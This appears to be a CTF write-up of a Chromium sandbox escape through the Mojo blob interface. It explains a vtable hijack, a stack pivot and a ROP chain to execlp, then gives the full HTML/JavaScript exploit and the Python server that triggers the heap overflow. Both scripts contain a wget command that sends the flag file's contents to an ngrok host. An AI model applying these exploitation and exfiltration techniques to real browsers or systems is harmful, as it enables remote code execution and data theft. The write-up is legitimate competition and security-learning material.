0x5c26b2ed2d78|+0x0008|+001: 0x00005c26ac41f2e0 <storage::BlobDataItem::~BlobDataItem()> -> 0x89485053e5894855

When the blob is freed it calls the function pointer at vtable + 0x08. The assembly that is executed is something along the lines of:

X86ASM
  ;; r14 points to our blob object
mov rax, qword ptr [r14]
;; rax points to the vtable from the blob
call qword ptr [rax + 0x08]

We can control the vtable that is used with our overflow and heap leak and also control the function pointer that is called. If we set the function pointer at vtable + 0x08 to a xchg rsp, rax ; ret gadget we are able to stack pivot into the vtable, which we have full control over. Using the binary leak we can ensure that the vtable contains a rop chain that will be executed as soon as the xchg gadget is called.

#arbitrary command execution

The chrome binary has a plt reference to execlp which is a perfect gadget to use for command execution. The [l] suffix means that argv is passed using variable arguments similar to printf, and the [p] suffix means that it will search for the command in PATH for us. The lack of the [e] suffix means that we don't need to specify envp and the libc will use the stored envp instead.

The rop chain ends up calling:

C
execlp("sh", "sh", "-c", command)

In our case the command to execute is 'wget "https://999b-2600-1700-9e31-5f0-00-3a.ngrok-free.app/hello/"$(cat /challenge/flag-*)' to exfiltrate the flag from remote.

#remote issues

#timeouts

Originally I was fetching the mojo files with:

HTML
<script src="mojojs/mojo_bindings.js"></script>
<script src="mojojs/gen/third_party/blink/public/mojom/otter/otter_broker.mojom.js"></script>
<script src="mojojs/gen/third_party/blink/public/mojom/blob/blob_registry.mojom.js"></script>

But this would fetch so many files that the exploit would take over 3 seconds to fetch all the necessary files. This was an issue since the timeout on remote was only 3 seconds and would kill the exploit before it started executing anything interesting. After spending a bit of time reading the mojo files, I realized that blob_registry.mojom.js was fetching a large amount of useless files and disabled it by setting mojo.config.autoLoadMojomDeps to false.

HTML
<script>
mojo.config.autoLoadMojomDeps = false;
</script>
<script src="template/public/mojojs/gen/third_party/blink/public/mojom/blob/blob_registry.mojom.js"></script>
<script src="template/public/mojojs/gen/third_party/blink/public/mojom/blob/data_element.mojom.js"></script>
<script src="template/public/mojojs/gen/third_party/blink/public/mojom/blob/blob.mojom.js"></script>

#hosting

The other issue was where to actually host the exploit. I could start a local server and use ngrok to expose port 80, but that would serve a warning page to the admin bot and it would never reach my exploit page. I also tried to use fly.io to host the exploit, but since I wasn't paying for a dedicated ipv4 address it was proxying my responses through an internal service. That internal service would reject my responses that contained both Transfer-Encoding and Content-Length headers since technically you are never supposed to have these headers in the same response. Thankfully @drakon let me borrow his server to host my exploit which let me finally run my exploit against remote and get the flag!

#FLAGGGGG

picoCTF{1ca2dfee}

#solve scripts

pwn.htmlHTML
<html>
<head>
<script src="template/public/mojojs/mojo_bindings.js"></script>
<script src="template/public/mojojs/gen/third_party/blink/public/mojom/otter/otter_broker.mojom.js"></script>
<script>
mojo.config.autoLoadMojomDeps = false;
</script>
<script src="template/public/mojojs/gen/third_party/blink/public/mojom/blob/blob_registry.mojom.js"></script>
<script src="template/public/mojojs/gen/third_party/blink/public/mojom/blob/data_element.mojom.js"></script>
<script src="template/public/mojojs/gen/third_party/blink/public/mojom/blob/blob.mojom.js"></script>

<script>
async function send(data) {
await fetch(window.location.href + "/" + data["method"], {
method: "POST",
headers: { "Content-Type": "application/json" },
body: JSON.stringify(data),
});
}

async function log(msg) {
await send({ method: "log", msg });
console.log(msg);
}

async function config(len, payload) {
await send({ method: "config", len, payload });
}

let blob_registry_ptr = new blink.mojom.BlobRegistryPtr();
Mojo.bindInterface(
blink.mojom.BlobRegistry.name,
mojo.makeRequest(blob_registry_ptr).handle,
"process"
);

async function getBlob(store, data) {
function Impl() {}
Impl.prototype = {
requestAsReply: async (a, b) => {
return {
data: [1],
};
},
requestAsStream: () => log("hi2"),
requestAsFile: () => log("hi3"),
};

let bytes_provider = new mojo.Binding(
blink.mojom.BytesProvider,
new Impl()
);
let bytes_provider_ptr = new blink.mojom.BytesProviderPtr();
bytes_provider.bind(mojo.makeRequest(bytes_provider_ptr));

let blob_ptr = new blink.mojom.BlobPtr();
let blob_req = mojo.makeRequest(blob_ptr);

if (typeof data === "string") {
data = new TextEncoder().encode(data);
// console.log(data.constructor.name);
}

let data_element = new blink.mojom.DataElement();
data_element.bytes = new blink.mojom.DataElementBytes();
data_element.bytes.length = data.length;
data_element.bytes.embeddedData = data;
data_element.bytes.data = bytes_provider_ptr;

let r = await blob_registry_ptr.register(
blob_req,
Math.random().toString(),
"text/data",
"text/data",
[data_element]
);

store.push(blob_ptr);
return blob_ptr;
}

async function readBlob(blob_ptr, offset, length) {
let readpipe = Mojo.createDataPipe({
elementNumBytes: 1,
capacityNumBytes: length,
});
blob_ptr.readRange(offset, length, readpipe.producer, null);
let buf = await new Promise((resolve) => {
let watcher = readpipe.consumer.watch(
{ readable: true },
(r) => {
let result = new ArrayBuffer(length);
let a = readpipe.consumer.readData(result);
watcher.cancel();
resolve(result.slice(0, a.numBytes));
}
);
});
return new Uint8Array(buf);
}

function flat(size, data) {
let buf = new ArrayBuffer(size);
for (let [offset, n] of Object.entries(data)) {
new BigUint64Array(buf, offset, 1)[0] = BigInt(n);
}
return new Uint8Array(buf, 0, size);
}

function u64(buf) {
return new BigUint64Array(
buf.buffer,
buf.byteOffset,
buf.byteLength / 8
);
}

function u8(buf) {
return new Uint8Array(
buf.buffer,
buf.byteOffset,
buf.byteLength
);
}

function hex(n) {
return `0x${n.toString(16)}`;
}

const global_blobs = [];

(async () => {
let ptr = new blink.mojom.OtterBrokerServicePtr();
Mojo.bindInterface(
blink.mojom.OtterBrokerService.name,
mojo.makeRequest(ptr).handle
);

ptr.init(window.location.hostname);

await log("starting");

let spray = 200;

for (let i = 0; i < spray; i++) {
await getBlob(global_blobs, "R".repeat(0x1000));
await readBlob(global_blobs[i], 0, 8);
}

let command =
'wget "https://999b-2600-1700-9e31-5f0-00-3a.ngrok-free.app/hello/"$(cat /challenge/flag-*)';
// 'echo hiiiii && xterm -hold -e "{ echo cowsay moo; cat; } | /bin/sh"\0';

let strings = new Array(30);
let other = "B".repeat(0x370);
for (let i = 0; i < strings.length; i++) {
strings[i] = new TextEncoder().encode(
"LES-AMATEURS-" +
i.toString(16).padStart(2, "0") +
"Z".repeat(0x1000 - 15)
);
}
for (let i = 0; i < strings.length; i++) {
await getBlob(global_blobs, strings[i]);
}

await log("done making blobs");

let start = spray + 10;

global_blobs[start + 2].ptr.reset();
global_blobs[start + 3].ptr.reset();
global_blobs[start + 0].ptr.reset();

await readBlob(await getBlob(global_blobs, other), 0, 8);

let payload = flat(0x380 + 0x380 + 0x60, {
0x370: 0x0dd0fecaefbeadden,
0x378: 0x1eab11ba05f03713n,
0x388: 1,
0x3d8: 0,
0x6f0: 0x0dd0fecaefbeadden,
0x6f8: 0x1eab11ba05f03713n,
0x708: 1,
0x758: 0x87654321,
});
let encoded = new TextEncoder().encode(command);
for (let i = 0; i < encoded.length; i++) {
payload[0x380 + i] = encoded[i];
}

await config(0x370, payload);
global_blobs[start + 1].ptr.reset();
await ptr.getSlot();

let idx = spray + strings.length;
let target = global_blobs[idx];
await log("/found target");

let view = u64(await readBlob(target, 0, 0x800));
await log("hi" + view[(0x380 + 0x68) / 8]);
await log(`sizeof(self) = ${hex(view[(0x380 + 0x58) / 8])}`);
let self = view[(0x380 + 0x60) / 8];
let vtable = view[0x700 / 8];
let base = vtable - 0x117ded70n;
let xchg = base + 0x0b3aec75n;
let syscall = base + 0x0c0853c7n;
let rax = base + 0x0efff686n;
let rdi = base + 0x1152db1bn;
let rsi = base + 0x1150ce1cn;
let rdx = base + 0x1147a146n;
let rcx = base + 0x1150cbfan;
let r8 = base + 0x0efff673n;
let r9 = base + 0x1020d557n;
let execvp = base + 0x1152e5d0n;
let execlp = base + 0x1152dea0n;
let sh = base + 0x26681f5n;
let tac = base + 0x12616een;
let cmd = self;

// await log(`self = ${hex(self)}`);
// await log(`vtable = ${hex(vtable)}`);
// await log(`base = ${hex(base)}`);

// await log(`xchg gadget = ${hex(xchg)}`);

let fake_vtable = u64(new Uint8Array(0x370));
let r = 0;
fake_vtable[r++] = rax;
fake_vtable[r++] = xchg;
fake_vtable[r++] = rdi;
fake_vtable[r++] = sh;
fake_vtable[r++] = rsi;
fake_vtable[r++] = sh;
fake_vtable[r++] = rdx;
fake_vtable[r++] = tac;
fake_vtable[r++] = rcx;
fake_vtable[r++] = cmd;
fake_vtable[r++] = r8;
fake_vtable[r++] = 0n;
fake_vtable[r++] = execlp;

await readBlob(
await getBlob(global_blobs, "Z".repeat(0x1000)),
0,
8
);
await readBlob(
await getBlob(global_blobs, "Z".repeat(0x1000)),
0,
8
);

global_blobs[start + 6].ptr.reset();
global_blobs[start + 7].ptr.reset();
global_blobs[start + 8].ptr.reset();
await readBlob(
await getBlob(global_blobs, u8(fake_vtable)),
0,
8
);

let fake_addr = undefined;
for (let i = 0; i < 0x380 * 10; i += 0x380) {
let leak = u64(await readBlob(target, i, 0x10));
if (leak[1] == xchg) {
fake_addr = self + BigInt(i);
// await log(`found payload at ${hex(fake_addr)}`);
// await log(`diff = ${hex(fake_addr - self)}`);
break;
}
}

if (fake_addr === undefined) {
// await log(`failed to find payload`);
return;
}

await config(
0x370,
flat(0x380 + 0x80, {
0x000: 0x4545454545454545n,
0x008: 0x4545454545454545n,
0x010: 0x4545454545454545n,
0x018: 0x4545454545454545n,
0x370: 0x0dd0fecaefbeadden,
0x378: 0x1eab11ba05f03713n,
0x380: fake_addr,
0x388: 1,
0x310: 0x424242,
0x318: 0x434343,
})
);

global_blobs[start + 11].ptr.reset();
await ptr.getSlot();
global_blobs[start + 12].ptr.reset();

await log("done");

while (1) {}
})();
</script>
</head>
</html>
server.pyPY
from http.server import SimpleHTTPRequestHandler, ThreadingHTTPServer as HTTPServer
import json
from base64 import b64decode

dummy_len = 0
payload = b""

class Handler(SimpleHTTPRequestHandler):
protocol_version = "HTTP/1.1"

def do_GET(self):
# print("handling get request")
super().do_GET()

def config(self, req):
global dummy_len, payload
dummy_len = req["len"]
payload = bytes(req["payload"].values())

print(f"len = {dummy_len:#x}")

self.send_header("Content-Length", "0")
self.end_headers()

def log(self, req):
print(req["msg"])

self.send_header("Content-Length", "0")
self.end_headers()

def overflow(self, req):
print("sending payload")
print(f"dummy len = {dummy_len:#x}, actual len = {len(payload):#x}")

self.send_header("Transfer-Encoding", "chunked")
self.send_header("Content-Length", str(dummy_len))
self.end_headers()

body: bytes = b""
body += f"{len(payload):x}\r\n".encode()
body += payload
body += b"\r\n"
body += b"0\r\n\r\n\r\n"
# print(body)

self.wfile.write(body)

def do_POST(self):
print("reading length")
contentlen = int(self.headers.get("Content-Length"))
print(contentlen)
data = self.rfile.read(contentlen)
# print(data)
req = json.loads(data)
method = req["method"]

self.send_response(200)
self.send_header("Access-Control-Allow-Origin", "*")

print(method)

match method:
case "config":
self.config(req)
case "log":
self.log(req)
case "getSlot":
self.overflow(req)
case _:
print(f"unknown method: {method}")

# def log_request(self, code = "-", size = "-"):
# return

server = HTTPServer(("0.0.0.0", 80), Handler)
server.serve_forever()

#chromium exploitation

#mojo blob internals

#partition alloc